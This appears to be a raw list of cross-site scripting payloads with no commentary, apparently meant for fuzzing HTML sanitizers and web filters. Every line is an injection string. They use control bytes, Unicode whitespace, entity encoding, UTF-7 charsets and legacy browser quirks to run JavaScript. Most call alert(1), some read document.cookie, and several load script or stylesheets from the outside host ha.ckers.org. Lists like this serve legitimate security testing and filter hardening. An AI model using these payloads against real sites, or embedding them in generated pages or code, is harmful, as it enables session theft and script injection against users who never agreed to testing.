ABC<div style=\"x:\\xE2\\x80\\x8Bexpression(javascript:alert(1)\">DEF
ABC<div style=\"x:\\xE2\\x80\\x86expression(javascript:alert(1)\">DEF
ABC<div style=\"x:\\xE2\\x80\\x85expression(javascript:alert(1)\">DEF
ABC<div style=\"x:\\xE2\\x80\\x82expression(javascript:alert(1)\">DEF
ABC<div style=\"x:\\x0Bexpression(javascript:alert(1)\">DEF
ABC<div style=\"x:\\xE2\\x80\\x81expression(javascript:alert(1)\">DEF
ABC<div style=\"x:\\xE2\\x80\\x83expression(javascript:alert(1)\">DEF
ABC<div style=\"x:\\xE2\\x80\\x89expression(javascript:alert(1)\">DEF
<a href=\"\\x0Bjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"\\x0Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"\\xC2\\xA0javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"\\x05javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"\\xE1\\xA0\\x8Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"\\x18javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"\\x11javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"\\xE2\\x80\\x88javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"\\xE2\\x80\\x89javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"\\xE2\\x80\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"\\x17javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"\\x03javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"\\x0Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"\\x1Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"\\x00javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"\\x10javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"\\xE2\\x80\\x82javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"\\x20javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"\\x13javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"\\x09javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"\\xE2\\x80\\x8Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"\\x14javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"\\x19javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"\\xE2\\x80\\xAFjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"\\x1Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"\\xE2\\x80\\x81javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"\\x1Djavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"\\xE2\\x80\\x87javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"\\x07javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"\\xE1\\x9A\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"\\xE2\\x80\\x83javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"\\x04javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"\\x01javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"\\x08javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"\\xE2\\x80\\x84javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"\\xE2\\x80\\x86javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"\\xE3\\x80\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"\\x12javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"\\x0Djavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"\\x0Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"\\x0Cjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"\\x15javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"\\xE2\\x80\\xA8javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"\\x16javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"\\x02javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"\\x1Bjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"\\x06javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"\\xE2\\x80\\xA9javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"\\xE2\\x80\\x85javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"\\x1Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"\\xE2\\x81\\x9Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"\\x1Cjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"javascript\\x00:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"javascript\\x3A:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"javascript\\x09:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"javascript\\x0D:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
<a href=\"javascript\\x0A:javascript:alert(1)\" id=\"fuzzelement1\">test</a>
`\"'><img src=xxx:x \\x0Aonerror=javascript:alert(1)>
`\"'><img src=xxx:x \\x22onerror=javascript:alert(1)>
`\"'><img src=xxx:x \\x0Bonerror=javascript:alert(1)>
`\"'><img src=xxx:x \\x0Donerror=javascript:alert(1)>
`\"'><img src=xxx:x \\x2Fonerror=javascript:alert(1)>
`\"'><img src=xxx:x \\x09onerror=javascript:alert(1)>
`\"'><img src=xxx:x \\x0Conerror=javascript:alert(1)>
`\"'><img src=xxx:x \\x00onerror=javascript:alert(1)>
`\"'><img src=xxx:x \\x27onerror=javascript:alert(1)>
`\"'><img src=xxx:x \\x20onerror=javascript:alert(1)>
\"`'><script>\\x3Bjavascript:alert(1)</script>
\"`'><script>\\x0Djavascript:alert(1)</script>
\"`'><script>\\xEF\\xBB\\xBFjavascript:alert(1)</script>
\"`'><script>\\xE2\\x80\\x81javascript:alert(1)</script>
\"`'><script>\\xE2\\x80\\x84javascript:alert(1)</script>
\"`'><script>\\xE3\\x80\\x80javascript:alert(1)</script>
\"`'><script>\\x09javascript:alert(1)</script>
\"`'><script>\\xE2\\x80\\x89javascript:alert(1)</script>
\"`'><script>\\xE2\\x80\\x85javascript:alert(1)</script>
\"`'><script>\\xE2\\x80\\x88javascript:alert(1)</script>
\"`'><script>\\x00javascript:alert(1)</script>
\"`'><script>\\xE2\\x80\\xA8javascript:alert(1)</script>
\"`'><script>\\xE2\\x80\\x8Ajavascript:alert(1)</script>
\"`'><script>\\xE1\\x9A\\x80javascript:alert(1)</script>
\"`'><script>\\x0Cjavascript:alert(1)</script>
\"`'><script>\\x2Bjavascript:alert(1)</script>
\"`'><script>\\xF0\\x90\\x96\\x9Ajavascript:alert(1)</script>
\"`'><script>-javascript:alert(1)</script>
\"`'><script>\\x0Ajavascript:alert(1)</script>
\"`'><script>\\xE2\\x80\\xAFjavascript:alert(1)</script>
\"`'><script>\\x7Ejavascript:alert(1)</script>
\"`'><script>\\xE2\\x80\\x87javascript:alert(1)</script>
\"`'><script>\\xE2\\x81\\x9Fjavascript:alert(1)</script>
\"`'><script>\\xE2\\x80\\xA9javascript:alert(1)</script>
\"`'><script>\\xC2\\x85javascript:alert(1)</script>
\"`'><script>\\xEF\\xBF\\xAEjavascript:alert(1)</script>
\"`'><script>\\xE2\\x80\\x83javascript:alert(1)</script>
\"`'><script>\\xE2\\x80\\x8Bjavascript:alert(1)</script>
\"`'><script>\\xEF\\xBF\\xBEjavascript:alert(1)</script>
\"`'><script>\\xE2\\x80\\x80javascript:alert(1)</script>
\"`'><script>\\x21javascript:alert(1)</script>
\"`'><script>\\xE2\\x80\\x82javascript:alert(1)</script>
\"`'><script>\\xE2\\x80\\x86javascript:alert(1)</script>
\"`'><script>\\xE1\\xA0\\x8Ejavascript:alert(1)</script>
\"`'><script>\\x0Bjavascript:alert(1)</script>
\"`'><script>\\x20javascript:alert(1)</script>
\"`'><script>\\xC2\\xA0javascript:alert(1)</script>
\"/><img/onerror=\\x0Bjavascript:alert(1)\\x0Bsrc=xxx:x />
\"/><img/onerror=\\x22javascript:alert(1)\\x22src=xxx:x />
\"/><img/onerror=\\x09javascript:alert(1)\\x09src=xxx:x />
\"/><img/onerror=\\x27javascript:alert(1)\\x27src=xxx:x />
\"/><img/onerror=\\x0Ajavascript:alert(1)\\x0Asrc=xxx:x />
\"/><img/onerror=\\x0Cjavascript:alert(1)\\x0Csrc=xxx:x />
\"/><img/onerror=\\x0Djavascript:alert(1)\\x0Dsrc=xxx:x />
\"/><img/onerror=\\x60javascript:alert(1)\\x60src=xxx:x />
\"/><img/onerror=\\x20javascript:alert(1)\\x20src=xxx:x />
<script\\x2F>javascript:alert(1)</script>
<script\\x20>javascript:alert(1)</script>
<script\\x0D>javascript:alert(1)</script>
<script\\x0A>javascript:alert(1)</script>
<script\\x0C>javascript:alert(1)</script>
<script\\x00>javascript:alert(1)</script>
<script\\x09>javascript:alert(1)</script>
\"><img src=x onerror=javascript:alert(1)>
\"><img src=x onerror=javascript:alert('1')>
\"><img src=x onerror=javascript:alert(\"1\")>
\"><img src=x onerror=javascript:alert(`1`)>
\"><img src=x onerror=javascript:alert(('1'))>
\"><img src=x onerror=javascript:alert((\"1\"))>
\"><img src=x onerror=javascript:alert((`1`))>
\"><img src=x onerror=javascript:alert(A)>
\"><img src=x onerror=javascript:alert((A))>
\"><img src=x onerror=javascript:alert(('A'))>
\"><img src=x onerror=javascript:alert('A')>
\"><img src=x onerror=javascript:alert((\"A\"))>
\"><img src=x onerror=javascript:alert(\"A\")>
\"><img src=x onerror=javascript:alert((`A`))>
\"><img src=x onerror=javascript:alert(`A`)>
`\"'><img src=xxx:x onerror\\x0B=javascript:alert(1)>
`\"'><img src=xxx:x onerror\\x00=javascript:alert(1)>
`\"'><img src=xxx:x onerror\\x0C=javascript:alert(1)>
`\"'><img src=xxx:x onerror\\x0D=javascript:alert(1)>
`\"'><img src=xxx:x onerror\\x20=javascript:alert(1)>
`\"'><img src=xxx:x onerror\\x0A=javascript:alert(1)>
`\"'><img src=xxx:x onerror\\x09=javascript:alert(1)>
<script>javascript:alert(1)<\\x00/script>
<img src=# onerror\\x3D\"javascript:alert(1)\" >
<input onfocus=javascript:alert(1) autofocus>
<>
<input onblur=javascript:alert(1) autofocus><input autofocus>
<video poster=javascript:javascript:alert(1)//
<body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X
<video><source onerror=\"javascript:javascript:alert(1)\">
<video onerror=\"javascript:javascript:alert(1)\"><source>
<form><button formaction=\"javascript:javascript:alert(1)\">X
<body oninput=javascript:alert(1)><input autofocus>
<math href=\"javascript:javascript:alert(1)\">CLICKME</math>  <math> <maction actiontype=\"statusline#http://google.com\" xlink:href=\"javascript:javascript:alert(1)\">CLICKME</maction> </math>
<frameset onload=javascript:alert(1)>
<table background=\"javascript:javascript:alert(1)\">
<!--<img src=\"--><img src=x onerror=javascript:alert(1)//\">
<comment><img src=\"</comment><img src=x onerror=javascript:alert(1))//\">
<![><img src=\"]><img src=x onerror=javascript:alert(1)//\">
<style><img src=\"</style><img src=x onerror=javascript:alert(1)//\">
<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div>
<head><base href=\"javascript://\"></head><body><a href=\"/. /,javascript:alert(1)//#\">XXX</a></body>
<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT>
<OBJECT CLASSID=\"clsid:333C7BC4-460F-11D0-BC04-0080C7055A83\"><PARAM NAME=\"DataURL\" VALUE=\"javascript:alert(1)\"></OBJECT>
<object data=\"data:text/html;base64,%(base64)s\">
<embed src=\"data:text/html;base64,%(base64)s\">
<b <script>alert(1)</script>0
<div id=\"div1\"><input value=\"``onmouseover=javascript:alert(1)\"></div> <div id=\"div2\"></div><script>document.getElementById(\"div2\").innerHTML = document.getElementById(\"div1\").innerHTML;</script>
<x '=\"foo\"><x foo='><img src=x onerror=javascript:alert(1)//'>
<embed src=\"javascript:alert(1)\">
<img src=\"javascript:alert(1)\">
<image src=\"javascript:alert(1)\">
<script src=\"javascript:alert(1)\">
<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x
<? foo=\"><script>javascript:alert(1)</script>\">
<! foo=\"><script>javascript:alert(1)</script>\">
</ foo=\"><script>javascript:alert(1)</script>\">
<? foo=\"><x foo='?><script>javascript:alert(1)</script>'>\">
<! foo=\"[[[Inception]]\"><x foo=\"]foo><script>javascript:alert(1)</script>\">
<% foo><x foo=\"%><script>javascript:alert(1)</script>\">
<div id=d><x xmlns=\"><iframe onload=javascript:alert(1)\"></div> <script>d.innerHTML=d.innerHTML</script>
<img \\x00src=x onerror=\"alert(1)\">
<img \\x47src=x onerror=\"javascript:alert(1)\">
<img \\x11src=x onerror=\"javascript:alert(1)\">
<img \\x12src=x onerror=\"javascript:alert(1)\">
<img\\x47src=x onerror=\"javascript:alert(1)\">
<img\\x10src=x onerror=\"javascript:alert(1)\">
<img\\x13src=x onerror=\"javascript:alert(1)\">
<img\\x32src=x onerror=\"javascript:alert(1)\">
<img\\x47src=x onerror=\"javascript:alert(1)\">
<img\\x11src=x onerror=\"javascript:alert(1)\">
<img \\x47src=x onerror=\"javascript:alert(1)\">
<img \\x34src=x onerror=\"javascript:alert(1)\">
<img \\x39src=x onerror=\"javascript:alert(1)\">
<img \\x00src=x onerror=\"javascript:alert(1)\">
<img src\\x09=x onerror=\"javascript:alert(1)\">
<img src\\x10=x onerror=\"javascript:alert(1)\">
<img src\\x13=x onerror=\"javascript:alert(1)\">
<img src\\x32=x onerror=\"javascript:alert(1)\">
<img src\\x12=x onerror=\"javascript:alert(1)\">
<img src\\x11=x onerror=\"javascript:alert(1)\">
<img src\\x00=x onerror=\"javascript:alert(1)\">
<img src\\x47=x onerror=\"javascript:alert(1)\">
<img src=x\\x09onerror=\"javascript:alert(1)\">
<img src=x\\x10onerror=\"javascript:alert(1)\">
<img src=x\\x11onerror=\"javascript:alert(1)\">
<img src=x\\x12onerror=\"javascript:alert(1)\">
<img src=x\\x13onerror=\"javascript:alert(1)\">
<img[a][b][c]src[d]=x[e]onerror=[f]\"alert(1)\">
<img src=x onerror=\\x09\"javascript:alert(1)\">
<img src=x onerror=\\x10\"javascript:alert(1)\">
<img src=x onerror=\\x11\"javascript:alert(1)\">
<img src=x onerror=\\x12\"javascript:alert(1)\">
<img src=x onerror=\\x32\"javascript:alert(1)\">
<img src=x onerror=\\x00\"javascript:alert(1)\">
<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a>
<img src=\"x` `<script>javascript:alert(1)</script>\"` `>
<img src onerror /\" '\"= alt=javascript:alert(1)//\">
<title onpropertychange=javascript:alert(1)></title><title title=>
<a href=http://foo.bar/#x=`y></a><img alt=\"`><img src=x:x onerror=javascript:alert(1)></a>\">
<!--[if]><script>javascript:alert(1)</script -->
<!--[if<img src=x onerror=javascript:alert(1)//]> -->
<script src=\"/\\%(jscript)s\"></script>
<script src=\"\\\\%(jscript)s\"></script>
<object id=\"x\" classid=\"clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598\"></object> <object classid=\"clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B\" onqt_error=\"javascript:alert(1)\" style=\"behavior:url(#x);\"><param name=postdomevents /></object>
<a style=\"-o-link:'javascript:javascript:alert(1)';-o-link-source:current\">X
<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style>
<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d
<style>@import \"data:,*%7bx:expression(javascript:alert(1))%7D\";</style>
<a style=\"pointer-events:none;position:absolute;\"><a style=\"position:absolute;\" onclick=\"javascript:alert(1);\">XXX</a></a><a href=\"javascript:javascript:alert(1)\">XXX</a>
<style>*[{}@import'%(css)s?]</style>X
<div style=\"font-family:'foo&#10;;color:red;';\">XXX
<div style=\"font-family:foo}color=red;\">XXX
<// style=x:expression\\28javascript:alert(1)\\29>
<style>*{x:ｅｘｐｒｅｓｓｉｏｎ(javascript:alert(1))}</style>
<div style=content:url(%(svg)s)></div>
<div style=\"list-style:url(http://foo.f)\\20url(javascript:javascript:alert(1));\">X
<div id=d><div style=\"font-family:'sans\\27\\3B color\\3Ared\\3B'\">X</div></div> <script>with(document.getElementById(\"d\"))innerHTML=innerHTML</script>
<div style=\"background:url(/f#&#127;oo/;color:red/*/foo.jpg);\">X
<div style=\"font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);\">X
<div id=\"x\">XXX</div> <style>  #x{font-family:foo[bar;color:green;}  #y];color:red;{}  </style>
<x style=\"background:url('x&#1;;color:red;/*')\">XXX</x>
<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>
<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>
<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script>
<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script>
<meta charset=\"x-imap4-modified-utf7\">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
<meta charset=\"x-imap4-modified-utf7\">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
<meta charset=\"mac-farsi\">¼script¾javascript:alert(1)¼/script¾
X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` >
1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`>
1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(1)&gt;>
<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe>
1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>
<a style=\"behavior:url(#default#AnchorClick);\" folder=\"javascript:javascript:alert(1)\">XXX</a>
<x style=\"behavior:url(%(sct)s)\">
<xml id=\"xss\" src=\"%(htc)s\"></xml> <label dataformatas=\"html\" datasrc=\"#xss\" datafld=\"payload\"></label>
<event-source src=\"%(event)s\" onload=\"javascript:alert(1)\">
<a href=\"javascript:javascript:alert(1)\"><event-source src=\"data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A\">
<div id=\"x\">x</div> <xml:namespace prefix=\"t\"> <import namespace=\"t\" implementation=\"#default#time2\"> <t:set attributeName=\"innerHTML\" targetElement=\"x\" to=\"&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;\">
<script>%(payload)s</script>
<script src=%(jscript)s></script>
<script language='javascript' src='%(jscript)s'></script>
<script>javascript:alert(1)</script>
<IMG SRC=\"javascript:javascript:alert(1);\">
<IMG SRC=javascript:javascript:alert(1)>
<IMG SRC=`javascript:javascript:alert(1)`>
<SCRIPT SRC=%(jscript)s?<B>
<FRAMESET><FRAME SRC=\"javascript:javascript:alert(1);\"></FRAMESET>
<BODY ONLOAD=javascript:alert(1)>
<BODY ONLOAD=javascript:javascript:alert(1)>
<IMG SRC=\"jav ascript:javascript:alert(1);\">
<BODY onload!#$%%&()*~+-_.,:;?@[/|\\]^`=javascript:alert(1)>
<SCRIPT/SRC=\"%(jscript)s\"></SCRIPT>
<<SCRIPT>%(payload)s//<</SCRIPT>
<IMG SRC=\"javascript:javascript:alert(1)\"
<iframe src=%(scriptlet)s <
<INPUT TYPE=\"IMAGE\" SRC=\"javascript:javascript:alert(1);\">
<IMG DYNSRC=\"javascript:javascript:alert(1)\">
<IMG LOWSRC=\"javascript:javascript:alert(1)\">
<BGSOUND SRC=\"javascript:javascript:alert(1);\">
<BR SIZE=\"&{javascript:alert(1)}\">
<LAYER SRC=\"%(scriptlet)s\"></LAYER>
<LINK REL=\"stylesheet\" HREF=\"javascript:javascript:alert(1);\">
<STYLE>@import'%(css)s';</STYLE>
<META HTTP-EQUIV=\"Link\" Content=\"<%(css)s>; REL=stylesheet\">
<XSS STYLE=\"behavior: url(%(htc)s);\">
<STYLE>li {list-style-image: url(\"javascript:javascript:alert(1)\");}</STYLE><UL><LI>XSS
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:javascript:alert(1);\">
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:javascript:alert(1);\">
<IFRAME SRC=\"javascript:javascript:alert(1);\"></IFRAME>
<TABLE BACKGROUND=\"javascript:javascript:alert(1)\">
<TABLE><TD BACKGROUND=\"javascript:javascript:alert(1)\">
<DIV STYLE=\"background-image: url(javascript:javascript:alert(1))\">
<DIV STYLE=\"width:expression(javascript:alert(1));\">
<IMG STYLE=\"xss:expr/*XSS*/ession(javascript:alert(1))\">
<XSS STYLE=\"xss:expression(javascript:alert(1))\">
<STYLE TYPE=\"text/javascript\">javascript:alert(1);</STYLE>
<STYLE>.XSS{background-image:url(\"javascript:javascript:alert(1)\");}</STYLE><A CLASS=XSS></A>
<STYLE type=\"text/css\">BODY{background:url(\"javascript:javascript:alert(1)\")}</STYLE>
<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]-->
<BASE HREF=\"javascript:javascript:alert(1);//\">
<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"%(scriptlet)s\"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT>
<HTML xmlns:xss><?import namespace=\"xss\" implementation=\"%(htc)s\"><xss:xss>XSS</xss:xss></HTML>\"\"\",\"XML namespace.\"),(\"\"\"<XML ID=\"xss\"><I><B>&lt;IMG SRC=\"javas<!-- -->cript:javascript:alert(1)\"&gt;</B></I></XML><SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></SPAN>
<HTML><BODY><?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\"><?import namespace=\"t\" implementation=\"#default#time2\"><t:set attributeName=\"innerHTML\" to=\"XSS&lt;SCRIPT DEFER&gt;javascript:alert(1)&lt;/SCRIPT&gt;\"></BODY></HTML>
<SCRIPT SRC=\"%(jpg)s\"></SCRIPT>
<HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-
<form id=\"test\" /><button form=\"test\" formaction=\"javascript:javascript:alert(1)\">X
<body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
<P STYLE=\"behavior:url('#default#time2')\" end=\"0\" onEnd=\"javascript:alert(1)\">
<STYLE>@import'%(css)s';</STYLE>
<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE>
<meta charset= \"x-imap4-modified-utf7\"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&>
<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT>
<style onreadystatechange=javascript:javascript:alert(1);></style>
<?xml version=\"1.0\"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html>
<embed code=%(scriptlet)s></embed>
<embed code=javascript:javascript:alert(1);></embed>
<embed src=%(jscript)s></embed>
<frameset onload=javascript:javascript:alert(1)></frameset>
<object onerror=javascript:javascript:alert(1)>
<embed type=\"image\" src=%(scriptlet)s></embed>
<XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]]<![CDATA[cript:javascript:alert(1);\">]]</C><X></xml>
<IMG SRC=&{javascript:alert(1);};>
<a href=\"jav&#65ascript:javascript:alert(1)\">test1</a>
<a href=\"jav&#97ascript:javascript:alert(1)\">test1</a>
<embed width=500 height=500 code=\"data:text/html,<script>%(payload)s</script>\"></embed>
<iframe srcdoc=\"&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=javascript:alert(1)&amp;gt;>\">
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\";
alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--
></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--\"<XSS>=&{()}
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC=\"javascript:alert('XSS');\">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert(\"XSS\")>
<IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>
<a onmouseover=\"alert(document.cookie)\">xxs link</a>
<a onmouseover=alert(document.cookie)>xxs link</a>
<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=# onmouseover=\"alert('xxs')\">
<IMG SRC= onmouseover=\"alert('xxs')\">
<IMG onmouseover=\"alert('xxs')\">
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC=\"jav ascript:alert('XSS');\">
<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">
<IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">
<IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">
perl -e 'print \"<IMG SRC=java\\0script:alert(\\\"XSS\\\")>\";' > out
<IMG SRC=\" &#14;  javascript:alert('XSS');\">
<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>
<SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<<SCRIPT>alert(\"XSS\");//<</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
<SCRIPT SRC=//ha.ckers.org/.j>
<IMG SRC=\"javascript:alert('XSS')\"
<iframe src=http://ha.ckers.org/scriptlet.html <
\\\";alert('XSS');//
</TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>
<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">
<BODY BACKGROUND=\"javascript:alert('XSS')\">
<IMG DYNSRC=\"javascript:alert('XSS')\">
<IMG LOWSRC=\"javascript:alert('XSS')\">
<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS</br>
<IMG SRC='vbscript:msgbox(\"XSS\")'>
<IMG SRC=\"livescript:[code]\">
<BODY ONLOAD=alert('XSS')>
<BGSOUND SRC=\"javascript:alert('XSS');\">
<BR SIZE=\"&{alert('XSS')}\">
<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">
<LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV=\"Link\" Content=\"<http://ha.ckers.org/xss.css>; REL=stylesheet\">
<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>
<STYLE>@im\\port'\\ja\\vasc\\ript:alert(\"XSS\")';</STYLE>
<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">
exp/*<A STYLE='no\\xss:noxss(\"*//*\");xss:ex/*XSS*//*/*/pression(alert(\"XSS\"))'>
